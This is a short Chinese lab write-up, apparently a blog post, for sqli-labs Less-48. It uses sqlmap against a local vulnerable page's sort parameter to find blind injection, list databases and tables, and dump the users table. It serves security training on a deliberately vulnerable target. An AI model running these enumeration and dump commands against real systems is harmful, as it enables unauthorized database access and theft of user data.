sqli-labs-Less-48

heze092026-03-17 9:17

SQLI-LAPS 实验记录

Less-48

这一关是盲注,页面上没有任何反馈信息,所以我们采用sqlmap工具来帮助进行自动化注入。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch

结果如图所示,有两种注入方式可选,布尔盲注和时间盲注,接下来我们继续采用sqlmap自动化注入。

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch --dbs

结果如图所示,页面返回数据库的名称,注入有效。

之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。

  • 爆出表名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security --tables
  • 爆出列名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --columns
  • 爆出内容:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --dump
相关推荐
heze092 小时前
sqli-labs-Less-49
数据库·mysql·网络安全
Knight_AL2 小时前
Java 中 Date 与 LocalDate 的区别
java·开发语言·数据库
不过普通话一乙不改名2 小时前
高可用:Keepalived 配置文件详解
mysql
人道领域2 小时前
【苍穹外卖】深度解析:商品浏览四大核心接口设计(附完整数据流转图)
java·数据库·后端·sql
Azure DevOps2 小时前
Azure DevOps Server:扩充数据库服务器的磁盘
服务器·数据库·microsoft·azure·devops
森叶2 小时前
《深度拆解数据库连接池:从底层 TCP 原理到 PHP-FPM 与 Swoole/Go 的架构演进》
数据库·tcp/ip·php
Paxon Zhang2 小时前
MySQL初阶入门的第一步
数据库·mysql·adb
littlegirll2 小时前
一个KADB报错分析及实验
java·javascript·数据库
十年编程老舅2 小时前
吃透 Linux 内核 IO 体系:块缓存与页缓存的核心设计与实现逻辑
linux·数据库·c++·spring·后端技术·页缓存
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04OpenClaw Control UI安全上下文访问配置05UV安装并设置国内源06本地部署 OpenClaw + DeepSeek-R1 完全指南07OpenClaw macOS 完整安装与本地模型配置教程(实战版)08Openclow安装保姆级教程09Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南